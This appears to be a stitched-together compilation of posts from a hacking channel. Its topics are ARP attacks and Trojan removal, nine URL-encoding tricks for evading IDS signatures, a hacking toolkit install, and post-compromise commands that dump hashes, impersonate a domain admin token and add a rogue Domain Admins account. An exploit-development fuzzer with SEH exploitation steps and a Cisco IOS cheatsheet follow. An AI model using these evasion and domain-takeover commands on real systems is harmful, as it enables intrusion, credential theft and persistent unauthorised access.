UNDERCODE SECURITY
🦑WELCOME TO UNDERCODE TESTING FOR LEARNING HACKING | PROGRAMMING | SECURITY & more..

THIS CHANNEL BY :

@UndercodeTesting
UndercodeTesting.com (official)

@iUndercode
iUndercode.com (iOs)

@Dailycve
DailyCve.com


@UndercodeNews
UndercodeNews.com

🦑WHAT IS AN ARP ATTACK & how to secure yourself?

ARP attacks mainly occur on a local area network. If a computer on the LAN is infected with an ARP Trojan, the infected system tries to intercept the traffic of other computers on the network by means of "ARP spoofing", which also causes communication failures for those computers. Below is the solution to an ARP attack on a computer.

🦑Solution when a computer suffers an ARP attack:
#FastTips

1. Turn on the system's built-in firewall. In fact, the built-in firewall can also cope with general ARP attacks, but few people use it. First click the Start menu and open the Control Panel.

2. On the Control Panel page, select the "System and Security" option.

3. In the System and Security interface, choose "Check firewall status" under Windows Firewall.

4. On the Windows Firewall status page, click "Open or close Windows Firewall" in the menu on the right.

5. On the "Open or close firewall" page, turn on the firewall for all network environments.

enjoy❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
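The firewall steps above do not show whether spoofing is taking place. As an added example (not part of the original post), this check parses Windows `arp -a` output and reports any unicast MAC address that answers for more than one IP address, a common sign of ARP spoofing; the sample table and all function names are constructed for the example.

```python
import re
from collections import defaultdict

# Constructed sample of Windows `arp -a` output (not captured from a real host).
SAMPLE_ARP_TABLE = """\
Interface: 192.168.1.23 --- 0xb
  Internet Address      Physical Address      Type
  192.168.1.1           00-1a-2b-3c-4d-5e     dynamic
  192.168.1.40          3c-52-82-aa-bb-cc     dynamic
  192.168.1.57          00-1a-2b-3c-4d-5e     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""

ENTRY = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+((?:[0-9a-f]{2}-){5}[0-9a-f]{2})\s+(\w+)\s*$",
    re.IGNORECASE,
)

def parse_arp_table(text):
    """Return (ip, mac, type) tuples for every entry line in `arp -a` output."""
    entries = []
    for line in text.splitlines():
        m = ENTRY.match(line)
        if m:
            entries.append((m.group(1), m.group(2).lower(), m.group(3).lower()))
    return entries

def is_group_mac(mac):
    """Broadcast and multicast MACs have the low bit of the first octet set."""
    return int(mac[:2], 16) & 1 == 1

def find_shared_macs(entries):
    """Map each unicast MAC that answers for more than one IP to those IPs."""
    by_mac = defaultdict(set)
    for ip, mac, _type in entries:
        if not is_group_mac(mac):
            by_mac[mac].add(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}

def gateway_is_suspect(entries, gateway_ip):
    """True if the gateway's MAC address is also claimed by another IP."""
    shared = find_shared_macs(entries)
    return any(gateway_ip in ips for ips in shared.values())

if __name__ == "__main__":
    table = parse_arp_table(SAMPLE_ARP_TABLE)
    for mac, ips in find_shared_macs(table).items():
        print(f"WARNING: {mac} answers for {', '.join(ips)}")
```

A shared MAC is a lead, not proof: a router that holds several addresses, or proxy ARP, produces the same pattern.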
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

🦑How to quickly remove a Trojan horse virus from the system?

Clearing a DLL backdoor: compared with file-bundled Trojans, the DLL insertion Trojan is more advanced. It has no process of its own, no ports, and so on, so it is difficult for ordinary users to notice. The removal steps are therefore relatively complicated.

1. End the Trojan horse process.
Since this type of Trojan horse is embedded in other processes, it does not generate an entry of its own in the process viewer. If we find that the system is behaving abnormally, we need to determine whether it has been hit by a DLL Trojan.

> Here we use the IceSword tool. After the program starts, it automatically detects the processes running on the system. Right-click a suspicious process and select "Module Information" in the pop-up menu to view all of its DLL modules in the pop-up window. If you find an item of unknown origin, select it and click the "Uninstall" button to remove it from the process. For some stubborn processes, also click the "Forced Release" button, and then use the address in the "Module File Name" column to delete the file directly from its folder.

2. Find suspicious DLL modules.
As general users are not familiar with how DLL files are called, it is difficult for them to determine which DLL module is suspicious. This is where ECQ-PS (Super Process King) comes in handy.

> After running the software, you can see all the processes in the current system in the middle list. Double-click one of the processes to display detailed information in the "All Modules" tab of the window below, including the module name, version, manufacturer, creation time, and so on. The manufacturer and creation time are the more important items. If a critical system process such as "svchost.exe" turns out to have loaded a module from an unknown manufacturer, that module must be a problem. In addition, if the manufacturer is Microsoft but the creation time differs from that of the other DLL modules, it may also be a DLL Trojan.

> We can also switch directly to the "Suspicious Module" option; the software automatically scans the modules for suspicious files and displays them in a list. Double-click a suspicious DLL module in the scan result list to see which processes call it. Generally, each DLL file is called by multiple processes. If a DLL file is called by only one process, it may also be a DLL Trojan. Click the "Forced Delete" button to delete the DLL Trojan from the process.

3. Thorough rootkit detection.
It is impossible for anyone to check the ports, registry, files, and services in the system all the time to see whether a Trojan is hidden there. At this point we can use some special tools for detection.


🦑Practical methods to break through an IDS (intrusion detection system):

There are many kinds of polymorphic URL encoding techniques; the author introduces 9 commonly used and representative methods here. For convenience of explanation, the URL with the submission address /msadc/msadcs.dll is used as the example. "/msadc/msadcs.dll" has been collected in the rule set files of Snort and other major IDSs, so when we submit /msadc/msadcs.dll directly to the target machine, it is intercepted and the IDS raises an alarm.

The first trick: "/./" string insertion method

Because of the special role of "./", we can insert it into the URL to transform the URL. For example, /msadc/msadcs.dll can be rewritten as /././msadc/././msadcs.dll, /./msadc/.//./msadcs.dll and other forms, to disrupt the IDS's signature analysis engine and so deceive the IDS. Moreover, the rewritten URL is equivalent to the unmodified URL. The author has shown through experiments that this method can bypass IDSs such as Snort.

The second trick: "00" ASCII code

Some time ago, Internet upload vulnerabilities exploited this feature, so everyone must be familiar with it. The principle is that when the computer processes a string, it automatically truncates it at ASCII code 00. We can rewrite /msadc/msadcs.dll as /msadc/msadcs.dll Iloveheikefangxian, use WinHex to change the space between .dll and Ilove to ASCII code 00, save it, and then submit it with NC and a pipe. In the view of some IDSs, /msadc/msadcs.dll Iloveheikefangxian is then not the same as the attack string specified in the rule set file, so they are indifferent to the attacker's behavior. Look how widely the principle of "automatically truncating at ASCII code 00 when the computer processes a string" applies! Philosophically speaking, things are connected with each other; we should think more and dig out the underlying laws, and then there will be new discoveries.

The third trick: use the path separator "\"

For web servers like Microsoft's IIS, "\" can also be used as a path separator, like "/". Some IDSs did not consider the non-standard path separator "\" when their rule set files were written. If we rewrite /msadc/msadcs.dll as \msadc\msadcs.dll, we can escape Snort, because there is no signature for \msadc\msadcs.dll in the Snort rule set file. It is worth mentioning that the path separator "\" has another magical use, the "%5c" "violent library" method mentioned in "Hacker Line of Defense" some time ago. "%5c" is the hexadecimal representation of "\".

The fourth trick: hexadecimal encoding

A character can be represented by the escape symbol "%" followed by its hexadecimal ASCII code. For example, the first character "/" in /msadc/msadcs.dll can be expressed as %2F, and the following characters can likewise be expressed as "%" plus their hexadecimal ASCII codes. A URL encoded this way no longer looks like the original. The encoded string may not be in the IDS rule set file, so the IDS can be bypassed. But this method is ineffective against an IDS that uses HTTP preprocessing.

The fifth trick: illegal Unicode encoding

UTF-8 encoding allows a character set of more than 256 characters, so it also allows encodings of more than 8 bits. The hexadecimal ASCII code of the "/" character is 2F, which is 00101111 in binary. The standard representation of 2F in UTF-8 is still 2F, but multi-byte UTF-8 can also be used to represent 2F. The character "/" can be represented in single-byte, double-byte, and three-byte UTF-8 as shown in the following table:

"/" character   Representation                Binary                        Hexadecimal
Single byte     0xxxxxxx                      00101111                      2F
Double byte     110xxxxx 10xxxxxx             11000000 10101111             C0 AF
Three bytes     1110xxxx 10xxxxxx 10xxxxxx    11100000 10000000 10101111    E0 80 AF

Using this method, we can encode the entire string accordingly. Although the encoded URLs all point to the same resource in the end, they are written differently, and the resulting string may not exist in the IDS rule set file, which achieves the goal of breaking through the IDS.

The sixth trick: redundant encoding method

Redundant encoding is also called double decoding. I still remember that the Unicode decoding vulnerabilities and the double decoding vulnerabilities of IIS caused a lot of noise in 2000-2001. At that time, many friends were confused and thought that the Unicode decoding vulnerability was the double decoding vulnerability. In fact, they are two different things: the former is described under "Illegal Unicode encoding", while redundant encoding means encoding a character multiple times. For example, the "/" character can be represented as %2f, and the "%", "2", and "f" characters in "%2f" can each be represented by their hexadecimal ASCII codes. By the mathematics of permutations and combinations, the number of encoding forms is 2 to the 3rd power, so "%2f" can be rewritten as "%25%32%66", "%252f", and so on, to make the URL polymorphic. The encoded string may not be collected in the IDS rule set file, which can fool some IDSs.

The seventh trick: add false paths

After adding the string "../" to the URL, the directory after the string has no meaning and becomes invalid. Therefore, the "../" string can be used to disrupt the signature analysis engine and break through the IDS!

The eighth trick: insert multiple slashes

We can use multiple "/" characters instead of a single "/". The rewritten URL still works as before. For example, the request for /msadc/msadcs.dll can be changed to ////msadc////msadcs.dll. The author's experiments show that this method can bypass some IDSs.

The ninth trick: comprehensive polymorphic encoding

Smart readers will know what this means as soon as they read the subtitle. The so-called comprehensive method combines the polymorphic encoding techniques introduced above, which gives a better effect. I hope this article is useful to you.


🦑2020 Updated Linux:

> It's a framework filled with a lot of options and hacking tools you use directly in the script, from brute forcing to payload making. I'm still trying to think of what to add to the script. I now have another tool out called htkl-lite; it's hackers-tool-kit, just not as big and messy. To see updates, check on my Instagram unkn0wn, or if there are any problems message me on Instagram.

INSTALLATION & RUN:

1. git clone https://github.com/unkn0wnh4ckr/hackers-tool-kit

2. cd hackers-tool-kit

3. python install.py

Run

4. ROOT IS NOT REQUIRED TO RUN BUT IS RECOMMENDED

5. cd hackers-tool-kit

6. python htk.py

Then choose an option.

7. The htksecure.py file will run the hackers-tool-kit with proxychains and other tools, making you anonymous when hacking, but some stuff might be slow or not work... To run htk secure, look below:

cd hackers-tool-kit

python htksecure.py

🦑Tested On:

> debian

> Undercode Linux


🦑 DomainAdminExploitation:

After compromising a Windows machine:

[>] List the domain administrators:
From Shell - net group "Domain Admins" /domain

[>] Dump the hashes (Metasploit)
msf > run post/windows/gather/smart_hashdump GETSYSTEM=FALSE

[>] Find the admins (Metasploit)
spool /tmp/enumdomainusers.txt
msf > use auxiliary/scanner/smb/smb_enumusers_domain
msf > set smbuser Administrator
msf > set smbpass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
msf > set rhosts 10.10.10.0/24
msf > set threads 8
msf > run

msf> spool off

[>] Compromise Admin's box
meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token MYDOM\\adaministrator
meterpreter > getuid
meterpreter > shell

C:\> whoami
mydom\adaministrator
C:\> net user hacker /add /domain
C:\> net group "Domain Admins" hacker /add /domain



🦑ExploitDev:
Development Cheatsheet
------------------------------

[+] Fuzzing:

import socket

# Build test strings of increasing length: "A", then 50, 100, 150, ... bytes.
buffer = [b"A"]
counter = 50

while len(buffer) <= 1000:
    buffer.append(b"A" * counter)
    counter = counter + 50

for buffstring in buffer:
    print("Fuzzing: " + str(len(buffstring)))
    # Open a fresh TCP connection to the test service for each string.
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect(("192.168.0.20", 5555))
    sock.send(buffstring)
    sock.close()


[+] Bad Character Testing:


[+] Structured Exception Handler (SEH) Exploitation notes

- Crash the application
- Check SEH overwrite (view-seh chain)
- Find offset (!mona pattern_create <length>)
- Find certain SEH references to the cyclic pattern (!mona findmsp)
- Verify offset to NSEH (Next Exception)
- Find POP/POP/RET address with mona (!mona seh -cpb <bad chars>)
- Add short jump into payload to jump over SEH ("\xeb\x06" + 2 bytes of padding)
- Add shellcode to the payload
- Ensure existing padding to make sure the crash still happens.


🦑Cisco IOS Command Line Cheatsheet

--- Verify Basic Configuration:

Shows information about the switch and its interfaces, RAM, NVRAM, flash, IOS, etc.
SW1# show version

Shows the current configuration file stored in DRAM.
SW1# show running-config

Shows the configuration file stored in NVRAM, which is used during the boot process.
SW1# show startup-config

Lists the commands currently held in the history buffer.
SW1# show history

Shows an overview of all interfaces, their physical status, protocol status and ip address if assigned.
SW1# show ip interface brief

Shows detailed information about the specified interface, its status, protocol, duplex, speed, encapsulation, last 5 min traffic.
SW1# show interface vlan 1

Shows the description of all interfaces
SW1# show interfaces description

Shows the status of all interfaces like connected or not, speed, duplex, trunk or access vlan.
SW1# show interfaces status

Shows the public encryption key used for SSH.
SW1# show crypto key mypubkey rsa

Shows information about the leased IP address (when an interface is configured to get IP address via a dhcp server)
SW1# show dhcp lease

Shows the router's routing table: the list of all networks that the router can reach.
Router# show ip route

--- Router Modes:

Router>: User mode = Limited to basic monitoring commands
Router#: Privileged mode (exec-level mode) = Provides access to all other router commands
Router(config)#: global configuration mode = Commands that affect the entire system
Router(config-if)#: interface mode = Commands that affect interfaces
Router(config-subif)#: subinterface mode = Commands that affect subinterfaces
Router(config-line)#: line mode = Commands that affect line modes (console, vty, aux...)
Router(config-router)#: router configuration mode

--- Changing switch hostname:

Switch(config)# hostname SW1

--- Configuring passwords:

SW1(config)# enable secret cisco ! MD5 hash
SW1(config)# enable password notcisco ! Clear text

--- Securing console port:

SW1(config)# line con 0
SW1(config-line)# password cisco
SW1(config-line)# login

--- Securing terminal lines:

SW1(config)# line vty 0 4
SW1(config-line)# password cisco
SW1(config-line)# login

--- Encrypting passwords:

SW1(config)# service password-encryption

--- Configuring banners:

SW1(config)# banner motd $


🦑UNAUTHORIZED ACCESS IS PROHIBITED
for CiscoIOS
#fastTips

--- Giving the switch an IP address:

SW1(config)# interface vlan 1
SW1(config-if)# ip address 172.16.1.11 255.255.255.0 ! or DHCP
SW1(config-if)# no shutdown

--- Setting the default gateway:

SW1(config)# ip default-gateway 172.16.1.1

--- Saving configuration:

SW1# copy running-config startup-config
Destination filename startup-config? ! Press enter to confirm file name.
Building configuration...
OK

! Short for write memory.
SW1# wr
Building configuration...
OK
